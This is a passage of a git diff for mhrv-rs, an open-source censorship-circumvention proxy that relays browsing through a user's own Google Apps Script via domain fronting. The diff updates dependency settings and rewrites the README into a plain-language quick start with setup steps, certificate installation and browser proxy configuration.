+version = "1.0.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7234f0d811589db492d16893e3f21e8e2fd282e6d01b0cddee310322062cc200"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 1.0.109",
+]
diff --git a/Cargo.toml b/Cargo.toml
index e7fdae86..12b0aaad 100644
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -1,6 +1,6 @@
 [package]
 name = "mhrv-rs"
-version = "1.6.0"
+version = "1.9.25"
 edition = "2021"
 description = "Rust port of MasterHttpRelayVPN -- DPI bypass via Google Apps Script relay with domain fronting"
 license = "MIT"
@@ -71,6 +71,7 @@ eframe = { version = "0.28", default-features = false, features = [
     "glow",
     "wgpu",
     "persistence",
+    "accesskit",
 ], optional = true }
 url = "2.5.8"
 
@@ -94,11 +95,15 @@ libc = "0.2"
 # traffic black-holes (symptom: Chrome shows DNS_PROBE_STARTED).
 [target.'cfg(target_os = "android")'.dependencies]
 jni = { version = "0.21", default-features = false }
-tun2proxy = { version = "0.7", default-features = false }
+tun2proxy = { version = "0.7", default-features = false, features = ["udpgw"] }
 
 [dev-dependencies]
 # Used in mitm tests to sanity-check the cert extensions we emit.
 x509-parser = "0.16"
+# `test-util` enables `tokio::test(start_paused = true)` so timing-
+# sensitive tests in `tunnel_client` (the empty-poll cadence) can
+# auto-advance virtual time instead of burning real wall-clock seconds.
+tokio = { version = "1", features = ["test-util"] }
 
 [profile.release]
 panic = "abort"
diff --git a/README.md b/README.md
index 938d10c1..cd065e04 100644
--- a/README.md
+++ b/README.md
@@ -1,777 +1,352 @@
-# MasterHttpRelayVPN-RUST
+# mhrv-rs — bypass censorship for free, with your own Google account
 
-[![Latest release](https://img.shields.io/github/v/release/therealaleph/MasterHttpRelayVPN-RUST?sort=semver&display_name=tag&logo=github&label=release)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest)
-[![Downloads](https://img.shields.io/github/downloads/therealaleph/MasterHttpRelayVPN-RUST/total?label=downloads&logo=github)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases)
+[![Latest release](https://img.shields.io/github/v/release/therealaleph/MasterHttpRelayVPN-RUST?display_name=tag&logo=github&label=release&color=blue&cacheSeconds=300)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest)
+[![Downloads](https://img.shields.io/github/downloads/therealaleph/MasterHttpRelayVPN-RUST/total.svg?label=downloads&logo=github&cacheSeconds=300)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases)
 [![CI](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/actions/workflows/release.yml/badge.svg)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/actions/workflows/release.yml)
 [![License: MIT](https://img.shields.io/github/license/therealaleph/MasterHttpRelayVPN-RUST?color=blue)](LICENSE)
 [![Stars](https://img.shields.io/github/stars/therealaleph/MasterHttpRelayVPN-RUST?style=flat&logo=github)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/stargazers)
 [![Support](https://img.shields.io/badge/❤️_Support-sh1n.org-red?style=flat)](https://sh1n.org/donate)
 
-Rust port of [@masterking32's MasterHttpRelayVPN](https://github.com/masterking32/MasterHttpRelayVPN). **All credit for the original idea and the Python implementation goes to [@masterking32](https://github.com/masterking32).** This is a faithful reimplementation of the `apps_script` mode, packaged as two tiny binaries (CLI + desktop UI) with no runtime dependencies.
+**A small program that runs on your computer and lets you visit blocked websites for free, using a Google Apps Script you deploy in your own free Google account. Your ISP only sees encrypted traffic to `www.google.com` — it can't tell what you're really visiting.**
 
-Free DPI bypass via Google Apps Script as a remote relay, with TLS SNI concealment. Your ISP's censor sees traffic going to `www.google.com`; behind the scenes a free Google Apps Script that you deploy in your own Google account fetches the real website for you.
+🇬🇧 [English Quick Start](#quick-start) · [Full Guide (advanced topics)](docs/guide.md)
+🇮🇷 [راه‌اندازی سریع فارسی](#راه‌اندازی-سریع) · [راهنمای کامل (مباحث پیشرفته)](docs/guide.fa.md)
 
-> **Heads up on authorship:** the bulk of this Rust port was written with [Anthropic's Claude](https://claude.com) driving, reviewed by a human on every commit. Bug reports, fixes, and contributions are all welcome — see the [issues page](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues).
+<p align="center" dir="rtl">
+  ۱. <a href="https://www.youtube.com/watch?v=voCwxgvWR5U" target="_blank" rel="noopener noreferrer">راهنمای تصویری راه اندازی به زبان فارسی</a> (YouTube)
+  <br>
+  ۲. <a href="https://kian-irani.github.io/mhrv-setup-full-tunell/" target="_blank" rel="noopener noreferrer">راهنمای جامع متنی راه اندازی به زبان فارسی</a> با تشکر از <a href="https://github.com/KIAN-IRANi" target="_blank" rel="noopener noreferrer">Kian Irani</a>
+</p>
 
-**[Quick Start (English)](SF_README.md#quick-start)** | **[English Guide](#setup-guide)** | **[راهنمای خلاصه فارسی](SF_README.md#راهنمای-خلاصه-فارسی)** | **[راهنمای کامل فارسی](#راهنمای-فارسی)**
-
-> **New here?** The Quick Start versions are short, plain-language, and cover the most common questions. The full guides have everything else (config options, full tunnel mode, OpenWRT, security notes).
+---
 
-## Why this exists
+## What you get
 
-The original Python project is excellent but requires Python + `pip install cryptography h2` + system deps. For users in hostile networks that install process is often itself broken (blocked PyPI, missing wheels, Windows without Python). This port is a single ~2.5 MB executable that you download and run. Nothing else.
+- 🌐 **Bypasses DPI / SNI blocking** by using Google's edge as a relay
+- 💯 **Completely free** — runs on your own Google account's free tier
+- ⚡ **One small file** (~3 MB), no Python, no Node.js, no dependencies
+- 🖥️ **Works on** Mac, Windows, Linux, Android, OpenWRT routers
+- 🦊 **Any browser or app** that supports HTTP proxy or SOCKS5
 
-## How it works
+## How it works (the simple picture)
 
 ```
-Browser / Telegram / xray
-        |
-        | HTTP proxy (8085)  or  SOCKS5 (8086)
-        v
-mhrv-rs (local)
-        |
-        | TLS to Google IP, SNI = www.google.com
-        v                       ^
-   DPI sees www.google.com      |
-        |                       | Host: script.google.com (inside TLS)
-        v                       |
-  Google edge frontend ---------+
-        |
-        v
-  Apps Script relay (your free Google account)
-        |
-        v
-  Real destination
+   you  →  browser  →  mhrv-rs  ──┐
+                                  │ ISP only sees:  www.google.com
+                                  ▼
+                          Google's network
+                                  │
+                                  ▼
+              your free Apps Script  fetches  the real site
+                                  │
+                                  ▼
+                Twitter / ChatGPT / blocked-site of your choice
 ```
 
-The censor's DPI sees `www.google.com` in the TLS SNI and lets it through. Google's frontend hosts both `www.google.com` and `script.google.com` on the same IP and routes by the HTTP `Host` header inside the encrypted stream.
-
-For a handful of Google-owned domains (`google.com`, `youtube.com`, `fonts.googleapis.com`, …) the same tunnel is used directly instead of going through the Apps Script relay. This bypasses the per-fetch quota and fixes the "User-Agent is always `Google-Apps-Script`" problem for those domains. You can add more domains via the `hosts` map in config.
-
-## Platforms
-
-Linux (x86_64, aarch64), macOS (x86_64, aarch64), Windows (x86_64), **Android 7.0+** (universal APK covering arm64, armv7, x86_64, x86). Prebuilt binaries on the [releases page](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases).
-
-**Android users** — grab `mhrv-rs-android-universal-v*.apk` and follow the full walk-through in [docs/android.md](docs/android.md) (English) or [docs/android.fa.md](docs/android.fa.md) (فارسی). The Android build runs the exact same `mhrv-rs` crate as the desktop (via JNI) and adds a TUN bridge via `tun2proxy`, so every app on the device routes its IP traffic through the proxy without per-app configuration.
-
-> **Important Android caveat (issues #74 / #81):** while TUN captures all IP traffic, _HTTPS_ traffic from third-party apps still only works for apps that trust user-installed CAs. From Android 7 onward (which covers all supported devices — `minSdk = 24`), apps must opt in via `networkSecurityConfig` to trust the MITM CA we install. **Chrome and Firefox do**; **Telegram, WhatsApp, Instagram, YouTube, banking apps, games** do not. For those apps, either use `PROXY_ONLY` mode and point their in-app proxy at `127.0.0.1:1081` (SOCKS5), use `google_only` mode (no CA required, Google services only), or set `upstream_socks5` to an external VPS. This is an Android security design, not a bug in this client — same limit applies to every other MITM proxy on the platform.
-
-## What's in a release
-
-Each archive contains two binaries and a launcher script:
-
-| file | purpose |
-|---|---|
-| `mhrv-rs` / `mhrv-rs.exe` | CLI. Headless use, servers, automation. Works on all platforms; no system deps on macOS/Windows. |
-| `mhrv-rs-ui` / `mhrv-rs-ui.exe` | Desktop UI (egui). Config form, Start/Stop/Test buttons, live stats, log panel. |
-| `run.sh` / `run.command` / `run.bat` | Platform launcher: installs the MITM CA (needs sudo/admin) and then starts the UI. Use this on first run. |
-
-macOS archives also ship `mhrv-rs.app` (in `*-app.zip`) — double-click to launch the UI without a terminal. You'll still need to run the CLI (`mhrv-rs --install-cert`) or `run.command` once to install the CA.
-
-<p align="center"><img src="docs/ui-screenshot.png" alt="mhrv-rs desktop UI showing config form, live traffic stats, Start/Stop/Test buttons, and log panel" width="420"></p>
-
-Linux UI also needs common desktop libraries available: `libxkbcommon`, `libwayland-client`, `libxcb`, `libgl`, `libx11`, `libgtk-3`. On most desktop distros these are already present; on a headless box install them via your package manager, or just use the CLI.
-
-## Where things live
-
-Config and the MITM CA live in the OS user-data dir:
-
-- macOS: `~/Library/Application Support/mhrv-rs/`
-- Linux: `~/.config/mhrv-rs/`
-- Windows: `%APPDATA%\mhrv-rs\`
-
-Inside that dir:
-
-- `config.json` — your settings (written by the UI's **Save** button or hand-edited)
-- `ca/ca.crt`, `ca/ca.key` — the MITM root certificate. Only you have the private key.
+ISPs can't read inside encrypted HTTPS. They only see the address — `www.google.com`. The actual page lookup happens inside Google's network, hidden in the encrypted tunnel.
 
-The CLI also falls back to `./config.json` in the current directory for backward compatibility with older setups.
+## Quick Start
 
-## Setup Guide
+**About 5 minutes.** You need:
 
-### Step 1 — Deploy the Apps Script relay (one-time)
+- A free Google account (any Gmail works)
+- A computer (Mac, Windows, or Linux)
+- Firefox or Chrome
 
-This part is unchanged from the original project. Follow @masterking32's guide or the summary below:
+### Step 1 — Make the Google Apps Script (one-time)
 
-1. Open <https://script.google.com> while signed into your Google account.
-2. **New project**, delete the default code.
-3. Copy the contents of [`Code.gs` from the original repo](https://github.com/masterking32/MasterHttpRelayVPN/blob/python_testing/apps_script/Code.gs) ([raw](https://raw.githubusercontent.com/masterking32/MasterHttpRelayVPN/refs/heads/python_testing/apps_script/Code.gs)) into the editor. If that URL is unreachable from your network, there's a mirrored copy in this repo at [`assets/apps_script/Code.gs`](assets/apps_script/Code.gs) — same file, pulled from upstream.
-4. Change `const AUTH_KEY = "..."` to a strong secret only you know.
-5. **Deploy → New deployment → Web app**.
-   - Execute as: **Me**
-   - Who has access: **Anyone**
-6. Copy the **Deployment ID** (the long random string in the URL).
-
-#### Can't reach `script.google.com` from your network?
-
-If your ISP is already blocking Google Apps Script (or all of Google), you need Step 1's browser connection to succeed *before* you have a relay to use. `mhrv-rs` ships a small bootstrap mode for exactly this: `google_only`.
-
-1. Build / download the binary as in Step 2 below.
-2. Copy [`config.google-only.example.json`](config.google-only.example.json) to `config.json` — no `script_id`, no `auth_key` required.
-3. Run `mhrv-rs serve` and set your browser's HTTP proxy to `127.0.0.1:8085`.
-4. In `google_only` mode the proxy only relays `*.google.com`, `*.youtube.com`, and the other Google-edge hosts via the same SNI-rewrite tunnel the full client uses. Other traffic goes direct — no Apps Script relay exists yet.
-5. Do Step 1 in your browser (the connection to `script.google.com` will be SNI-fronted). Deploy Code.gs, copy the Deployment ID.
-6. In the desktop UI or the Android app (or by editing `config.json`) switch the mode back to `apps_script`, paste the Deployment ID and your auth key, and restart.
-
-You can also verify reachability before even starting the proxy: `mhrv-rs test-sni` probes `*.google.com` directly and works without any config beyond `google_ip` + `front_domain`.
-
-### Step 2 — Download
-
-Grab the archive for your platform from the [releases page](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases) and extract it.
-
-Or build from source:
-
-```bash
-cargo build --release --features ui
-# Binaries: target/release/mhrv-rs and target/release/mhrv-rs-ui
-```
-
-### Step 3 — First run: install the MITM CA
-
-To route your browser's HTTPS traffic through the Apps Script relay, `mhrv-rs` has to terminate TLS locally on your machine, forward the request through the relay, and re-encrypt the response with a certificate your browser trusts. That requires a small **local** Certificate Authority.
+1. Go to **[script.google.com](https://script.google.com)**, sign in with your Google account
+2. Click **New project** at the top left
+3. Delete the default code in the editor
+4. Open the file [`assets/apps_script/Code.gs`](assets/apps_script/Code.gs) in this repo, copy all of it, paste into the Apps Script editor (replacing what was there)
+5. Find this line near the top:
+   ```js
+   const AUTH_KEY = "CHANGE_ME_TO_A_STRONG_SECRET";
+   ```
+   Change `CHANGE_ME_TO_A_STRONG_SECRET` to a long random string of your own. **Keep this string** — you'll paste it into the app in Step 3. Treat it like a password.
+6. Click 💾 **Save** (or `Ctrl/Cmd+S`)
+7. Click **Deploy** (top right) → **New deployment**
+8. Click the gear icon ⚙ next to "Select type" → choose **Web app**
+9. Set:
+   - **Execute as:** *Me* (your Google account)
+   - **Who has access:** *Anyone*
+10. Click **Deploy**. Google may ask for permissions — click **Authorize access** and approve
+11. Google shows a **Deployment ID** (a long random string). **Copy it** — you'll need it in Step 3.
 
-**What actually happens on first run:**
+> **Tip:** if you ever update `Code.gs` later, don't make a new deployment. Edit the code, then go to **Deploy → Manage deployments → ✏️ → Version: New version → Deploy**. The Deployment ID stays the same.
 
-- A fresh CA keypair (`ca/ca.crt` + `ca/ca.key`) is generated **on your machine**, in your user-data dir.
-- The public `ca.crt` is added to your system trust store so browsers accept the per-site certificates `mhrv-rs` mints on the fly. This is the step that needs sudo / Administrator.
-- The private `ca.key` **never leaves your machine**. Nothing uploads it, nothing phones home, and no remote party — including the Apps Script relay — can use it to impersonate sites to you.
-- You can revoke it at any time by deleting the CA from your OS keychain (macOS: Keychain Access → System → delete `mhrv-rs`) / Windows cert store / `/etc/ca-certificates`, and removing the `ca/` folder.
+### Step 2 — Download mhrv-rs
 
-The launcher does all of this for you and then starts the UI:
+Go to the [latest release page](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/releases/latest) and download the file for your computer:
 
-| platform | how |
+| You're on | Download this |
 |---|---|
-| macOS | double-click `run.command` in Finder (or `./run.command` in a terminal) |
-| Linux | `./run.sh` from a terminal |
-| Windows | double-click `run.bat` |
-
-It will ask for your password (sudo / UAC) **only** to trust the CA. After that the launcher also starts `mhrv-rs-ui`. On later runs you don't need the launcher — the CA is already trusted, so you can open `mhrv-rs.app` / `mhrv-rs-ui.exe` / `mhrv-rs-ui` directly.
-
-If you prefer to do the CA step by hand:
-
-```bash
-# Linux / macOS
-sudo ./mhrv-rs --install-cert
-
-# Windows (Administrator)
-mhrv-rs.exe --install-cert
-```
-
-Firefox keeps its own cert store; the installer also drops the CA into Firefox's NSS database via `certutil` (best-effort). If Firefox still complains, import `ca/ca.crt` manually via Settings → Privacy & Security → Certificates → View Certificates → Authorities → Import.
+| Mac with Apple Silicon (M1 / M2 / M3 / M4 chip) | `mhrv-rs-macos-arm64-app.zip` |
+| Mac with Intel chip | `mhrv-rs-macos-amd64-app.zip` |
+| Windows | `mhrv-rs-windows-amd64.zip` |
+| Linux (Ubuntu / Mint / Fedora / Debian / Arch) | `mhrv-rs-linux-amd64.tar.gz` |
+| Android phone or tablet | `mhrv-rs-android-universal-v*.apk` |
+| OpenWRT router or Alpine | `mhrv-rs-linux-musl-amd64.tar.gz` |
 
-### Step 4 — Configure in the UI
+> **Mac: not sure if Apple Silicon or Intel?** Click  → **About This Mac**. If "Chip" says **Apple**, get arm64. If **Intel**, get amd64.
 
-Open the UI and fill in the form:
+> **Linux: getting a `GLIBC` error?** Use the `linux-musl-amd64` file instead — it works on any Linux without dependencies.
 
-- **Apps Script ID** — the Deployment ID from Step 1. Add multiple IDs (one per line in the UI, or a JSON array in `config.json`) for higher quota **and** lower latency. In `apps_script` mode, IDs are round-robined. In `full` mode, each deployment gets its own pool of 30 concurrent requests (the Apps Script per-account limit), so more IDs = more total throughput (see [Full tunnel mode](#full-tunnel-mode) below).
-- **Auth key** — the same secret you set in `Code.gs`.
-- **Google IP** — `216.239.38.120` is a solid default. Use the **scan** button to probe for a faster one from your network.
-- **Front domain** — keep `www.google.com`.
-- **HTTP port** / **SOCKS5 port** — defaults `8085` / `8086`.
+Unzip it.
 
-Hit **Save**, then **Start**. Use **Test** any time to send one request end-to-end through the relay and report the result.
+### Step 3 — First run
 
-### Step 4 (alternative) — CLI only
+Double-click the launcher:
 
-Everything the UI does is also available in the CLI. Copy `config.example.json` to `config.json` (either next to the binary or into the user-data dir shown above), fill it in:
+| Mac | `run.command` |
+| Windows | `run.bat` |
+| Linux | `./run.sh` (in a terminal) |
 
-```json
-{
-  "mode": "apps_script",
-  "google_ip": "216.239.38.120",
-  "front_domain": "www.google.com",
-  "script_id": "PASTE_YOUR_DEPLOYMENT_ID_HERE",
-  "auth_key": "same-secret-as-in-code-gs",
-  "listen_host": "127.0.0.1",
-  "listen_port": 8085,
-  "socks5_port": 8086,
-  "log_level": "info",
-  "verify_ssl": true
-}
-```
-
-Then:
-
-```bash
-./mhrv-rs                   # serve (default)
-./mhrv-rs test              # one-shot end-to-end probe
-./mhrv-rs scan-ips          # rank Google frontend IPs by latency
-./mhrv-rs --install-cert    # reinstall the MITM CA
-./mhrv-rs --help
-```
-
-`script_id` can also be a JSON array: `["id1", "id2", "id3"]`.
-
-#### scan-ips configuration (optional)
-
-By default, the scan-ips subcommand uses a static array of IPs.
-
-You can enable dynamic IP discovery by setting fetch_ips_from_api to true in config.json:
-
-```json
-{
-  "fetch_ips_from_api": true,
-  "max_ips_to_scan": 100,
-  "scan_batch_size":100,
-  "google_ip_validation": true // check whether ips belongs to frontend sites of google or not
-}
-```
-
-When enabled:
-
-- Fetches goog.json from Google’s public IP ranges API
-- Extracts all CIDRs and expands them to individual IPs
-- Prioritizes IPs from famous Google domains (google.com, youtube.com, etc.)
-- Randomly selects up to max_ips_to_scan candidates (prioritized IPs first)
-- Tests only the selected candidates for connectivity and frontend validation.
-
-By using this options you may find ips witch are faster than static array that is provided as default but there is no guarantee that this ips would work.
-
-
-### Step 5 — Point your client at the proxy
-
-The tool listens on **two** ports. Use whichever your client supports:
-
-**HTTP proxy** (browsers, generic HTTP clients) — `127.0.0.1:8085`
-
-- **Firefox** — Settings → Network Settings → **Manual proxy**. HTTP host `127.0.0.1`, port `8085`, tick **Also use this proxy for HTTPS**.
-- **Chrome / Edge** — use the system proxy settings, or the **Proxy SwitchyOmega** extension.
-- **macOS system-wide** — System Settings → Network → Wi-Fi → Details → Proxies → enable **Web Proxy (HTTP)** and **Secure Web Proxy (HTTPS)**, both `127.0.0.1:8085`.
-- **Windows system-wide** — Settings → Network & Internet → Proxy → **Manual proxy setup**, address `127.0.0.1`, port `8085`.
-
-**SOCKS5 proxy** (Telegram, xray, app-level clients) — `127.0.0.1:8086`, no auth.
+The first time, it asks for your computer password. This is to install one small certificate so your browser trusts mhrv-rs. **The certificate is generated on your computer and never leaves it** — no cloud, no Google, nothing remote can use it.
 
-- Works for HTTP, HTTPS, **and** non-HTTP protocols (Telegram's MTProto, raw TCP). The server auto-detects each connection: HTTP/HTTPS go through the Apps Script relay, SNI-rewritable domains go through the direct Google-edge tunnel, and anything else falls through to raw TCP.
+The mhrv-rs window opens. Fill in:
 
-## Telegram, IMAP, SSH — pair with xray (optional)
-
-The Apps Script relay only speaks HTTP request/response, so non-HTTP protocols (Telegram MTProto, IMAP, SSH, arbitrary raw TCP) can't travel through it. Without anything else, those flows hit the direct-TCP fallback — which means they're not actually tunneled, and an ISP that blocks Telegram will still block them.
-
-Fix: run a local [xray](https://github.com/XTLS/Xray-core) (or v2ray / sing-box) with a VLESS/Trojan/Shadowsocks outbound that goes to a VPS of your own, and point mhrv-rs at xray's SOCKS5 inbound via the **Upstream SOCKS5** field (or the `upstream_socks5` config key). When set, raw-TCP flows coming through mhrv-rs's SOCKS5 listener get chained into xray → the real tunnel, instead of connecting directly.
-
-```
-Telegram  ┐                                                    ┌─ Apps Script ── HTTP/HTTPS
-          ├─ SOCKS5 :8086 ─┤ mhrv-rs ├─ SNI rewrite ─── google.com, youtube.com, …
-Browser   ┘                                                    └─ upstream SOCKS5 ─ xray ── VLESS ── your VPS   (Telegram, IMAP, SSH, raw TCP)
-```
-
-Example config fragment (both UI and JSON):
-
-```json
-{
-  "upstream_socks5": "127.0.0.1:50529"
-}
-```
-
-HTTP/HTTPS continues to route through the Apps Script relay (no change), and the SNI-rewrite tunnel for `google.com` / `youtube.com` / etc. keeps bypassing both — so YouTube stays as fast as before while Telegram gets a real tunnel.
-
-## Full tunnel mode
-
-Full tunnel mode (`"mode": "full"`) routes **all** traffic end-to-end through Apps Script and a remote [tunnel-node](tunnel-node/) — no MITM certificate needed. TCP is carried as persistent tunnel sessions, and UDP from Android/TUN clients is carried via SOCKS5 `UDP ASSOCIATE` to the tunnel-node, which then emits real UDP from the server side. The trade-off is higher latency per request (every byte/datagram goes Apps Script → tunnel-node → destination), but it works for protocols and apps that cannot use the MITM relay path.
-
-### How deployment IDs affect performance
-
-Each Apps Script batch request takes ~2 seconds round-trip. In full mode, `mhrv-rs` runs a **pipelined batch multiplexer** that fires multiple batch requests concurrently without waiting for the previous one to return. Each deployment ID (= one Google account) gets its own concurrency pool of **30 in-flight requests** — matching the Apps Script per-account execution limit.
-
-```
-max_concurrent = 30 × number_of_deployment_ids
-```
-
-| Deployments | Concurrent requests | Notes |
-|-------------|-------------------|-------|
-| 1 | 30 | Single account — plenty for light browsing |
-| 3 | 90 | Good for daily use |
-| 6 | 180 | Recommended for heavy use |
-| 12 | 360 | Multi-account power setup |
-
-More deployments = more total concurrency = lower per-session latency. Each batch round-robins across your deployment IDs, so the load is spread evenly and you're less likely to hit a single deployment's quota ceiling.
-
-**Resource guards** keep things safe:
-- **50 ops max** per batch — if more sessions are active, the mux splits into multiple batches
-- **4 MB payload cap** per batch — well under Apps Script's 50 MB limit
-- **30 s timeout** per batch — a slow/dead target can't block other sessions forever
-
-### Quick start
-
-1. Deploy [`CodeFull.gs`](assets/apps_script/CodeFull.gs) as a **Web App deployment** on each Google account (same steps as `Code.gs`, but use the full-mode script that forwards to your tunnel-node). Use **one deployment per Google account** — the 30-concurrent-request limit is per account, so multiple deployments on the same account share the same pool and don't add concurrency. To scale, add more accounts:
-   - **Solo use** → 1–2 accounts is plenty
-   - **Shared with ~3 people** → 3 accounts
-   - **Shared with a group** → one account per heavy user
-2. Deploy the [tunnel-node](tunnel-node/) on a VPS. The fastest path is the prebuilt Docker image:
-   ```bash
-   docker run -d --name mhrv-tunnel --restart unless-stopped \
-     -p 8080:8080 -e TUNNEL_AUTH_KEY=your-strong-secret \
-     ghcr.io/therealaleph/mhrv-tunnel-node:latest
-   ```
-   Multi-arch (linux/amd64 + linux/arm64), runs as a non-root user, ~32 MB compressed. Pin a version tag (`:1.5.0`) for production. See [tunnel-node/README.md](tunnel-node/README.md) for Cloud Run, docker-compose, and source-build alternatives.
-3. Set `"mode": "full"` in your config with all deployment IDs:
-
-```json
-{
-  "mode": "full",
-  "script_id": ["id1", "id2", "id3", "id4", "id5", "id6"],
-  "auth_key": "your-secret"
-}
-```
+- **Apps Script ID(s)** → paste the **Deployment ID** from Step 1
+- **Auth key** → paste the random string you put in `Code.gs`
+- Leave everything else at the defaults
 
-## Running on OpenWRT (or any musl distro)
+Click **Save config**, then **Start**. The status circle goes green if it works.
 
-The `*-linux-musl-*` archives ship a fully static CLI that runs on OpenWRT, Alpine, and any libc-less Linux userland. Put the binary on the router and start it as a service:
+> **Test it:** click the **Test** button. It sends one request through the relay and tells you if it worked.
 
-```sh
-# From a machine that can reach your router:
-scp mhrv-rs root@192.168.1.1:/usr/bin/mhrv-rs
-scp mhrv-rs.init root@192.168.1.1:/etc/init.d/mhrv-rs
-scp config.json root@192.168.1.1:/etc/mhrv-rs/config.json
+### Step 4 — Tell your browser to use mhrv-rs
 
-# On the router:
-chmod +x /usr/bin/mhrv-rs /etc/init.d/mhrv-rs
-/etc/init.d/mhrv-rs enable
-/etc/init.d/mhrv-rs start
-logread -e mhrv-rs -f   # tail its logs
-```
+#### Firefox (recommended — easiest)
 
-LAN devices then point their HTTP proxy at the router's LAN IP (default port `8085`) or their SOCKS5 at `<router-ip>:8086`. Set `listen_host` to `0.0.0.0` in `/etc/mhrv-rs/config.json` so the router accepts LAN connections instead of localhost-only.
+1. Firefox → ☰ menu → **Settings**
+2. Search "proxy" in the search box
+3. Click **Settings…** under Network Settings
+4. Choose **Manual proxy configuration**
+5. **HTTP Proxy:** `127.0.0.1` Port: `8085`
+6. ☑ Check **"Also use this proxy for HTTPS"**
+7. Click **OK**
 
-Memory footprint is ~15-20 MB resident — fine on anything with ≥128 MB RAM. No UI is shipped for musl (routers are headless).
+#### Chrome / Edge
 
-## Diagnostics
+Install the [Proxy SwitchyOmega](https://chromewebstore.google.com/detail/proxy-switchyomega/padekgcemlokbadohgkifijomclgjgif) extension and set proxy to `127.0.0.1:8085`.
 
-- **`mhrv-rs test`** — sends one request through the relay and reports success/latency. Use this first whenever something breaks — it isolates "relay is up" from "client config is wrong".
-- **`mhrv-rs scan-ips`** — parallel TLS probe of 28 known Google frontend IPs, sorted by latency. Take the winner and put it in `google_ip`. The UI has the same thing behind the **scan** button next to the Google IP field.
-- **`mhrv-rs test-sni`** — parallel TLS probe of every SNI name in your rotation pool against the configured `google_ip`. Tells you which front-domain names actually pass through your ISP's DPI. The UI has the same thing in the **SNI pool…** floating window, with checkboxes, per-row **Test** buttons, and a **Keep ✓ only** button that auto-trims to what worked.
-- **Periodic stats** are logged every 60 s at `info` level (relay calls, cache hit rate, bytes relayed, active vs. blacklisted scripts). The UI shows them live.
+#### macOS (whole system)
 
-### SNI pool editor
+System Settings → Network → Wi-Fi → Details → **Proxies** → enable both **Web Proxy (HTTP)** and **Secure Web Proxy (HTTPS)**, both pointing to `127.0.0.1:8085`.
 
-By default `mhrv-rs` rotates through `{www, mail, drive, docs, calendar}.google.com` on outbound TLS connections to your Google IP, to avoid fingerprinting one name too heavily. Some of those may be locally blocked — e.g. `mail.google.com` has been specifically targeted in Iran at various times.
+### Step 5 — Try it
 
-Either:
+Open any blocked site in your browser. It should load.
 
-- Open the UI, click **SNI pool…**, hit **Test all**, then **Keep ✓ only** to auto-trim. Add custom names via the text field at the bottom. Save.
-- Or edit `config.json` directly:
+If something doesn't work:
 
-```json
-{
-  "sni_hosts": ["www.google.com", "drive.google.com", "docs.google.com"]
-}
-```
+- Click **Test** in the mhrv-rs window — it pinpoints which step is failing
+- Look at the **Recent log** panel at the bottom of the window
+- See [Common questions](#common-questions) below
 
-Leaving `sni_hosts` unset gives you the default auto-pool. Run `mhrv-rs test-sni` to verify what works from your network before saving.
+---
 
-## What's implemented vs. not
+## Common questions
 
-This port focuses on the **`apps_script` mode** — the only one that reliably works against a modern censor in 2026. Implemented:
+**Is this really free?** Yes. Google gives every account 20,000 outbound URL fetches per day on the free tier. That's plenty for one person's normal browsing. For a family of 3–4 sharing the same setup, make 2–3 deployments in different Google accounts and add all the IDs.
 
-- [x] Local HTTP proxy (CONNECT for HTTPS, plain forwarding for HTTP)
-- [x] Local SOCKS5 proxy with smart TLS/HTTP/raw-TCP dispatch (Telegram, xray, etc.)
-- [x] MITM with on-the-fly per-domain cert generation via `rcgen`
-- [x] CA generation + auto-install on macOS / Linux / Windows
-- [x] Firefox NSS cert install (best-effort via `certutil`)
-- [x] Apps Script JSON relay, protocol-compatible with `Code.gs`
-- [x] Connection pooling (45 s TTL, max 20 idle)
-- [x] Gzip response decoding
-- [x] Multi-script round-robin
-- [x] Auto-blacklist failing scripts on 429 / quota errors (10-minute cooldown)
-- [x] Response cache (50 MB, FIFO + TTL, `Cache-Control: max-age` aware, heuristics for static assets)
-- [x] Request coalescing: concurrent identical GETs share one upstream fetch
-- [x] SNI-rewrite tunnels (direct to Google edge, bypassing the relay) for `google.com`, `youtube.com`, `youtu.be`, `youtube-nocookie.com`, `fonts.googleapis.com`. Extra domains configurable via the `hosts` map.
-- [x] Automatic redirect handling on the relay (`/exec` → `googleusercontent.com`)
-- [x] Header filtering (strip connection-specific, brotli)
-- [x] `test` and `scan-ips` subcommands
-- [x] Script IDs masked in logs (`prefix…suffix`) so `info` logs don't leak deployment IDs
-- [x] Desktop UI (egui) — cross-platform, no bundler needed
-- [x] Optional upstream SOCKS5 chaining for non-HTTP traffic (Telegram MTProto, IMAP, SSH…) so raw-TCP flows can be tunneled through xray / v2ray / sing-box instead of connecting directly. HTTP/HTTPS keeps going through the Apps Script relay.
-- [x] Connection pool pre-warm on startup (first request skips the TLS handshake to Google edge).
-- [x] Per-connection SNI rotation across a pool of Google subdomains (`www/mail/drive/docs/calendar.google.com`), so outbound connection counts aren't concentrated on one SNI.
-- [x] Optional parallel script-ID dispatch (`parallel_relay`): fan out a relay request to N script instances concurrently, return first success, kill p95 latency at the cost of N× quota.
-- [x] Per-site stats drill-down in the UI (requests, cache hit %, bytes, avg latency per host) for live debugging.
-- [x] Editable SNI rotation pool (UI window + `sni_hosts` config field) with per-name reachability probes (`mhrv-rs test-sni` CLI or **Test** / **Test all** / **Keep working only** buttons). DNS + TLS-handshake based, catches both DPI-blocked names and typos.
-- [x] OpenWRT / Alpine / musl builds — static binaries, procd init script included.
+**Is it safe?** The certificate stays on your computer — no one else has the private key. Your `auth_key` is your secret. Google sees the websites you visit through the relay (because Apps Script fetches them on your behalf) — same as any hosted proxy. If you're not OK with that, use Full Tunnel mode with your own VPS — see the [full guide](docs/guide.md#full-tunnel-mode).
 
-Intentionally **not** implemented (rationale included so future contributors don't spend cycles on them):
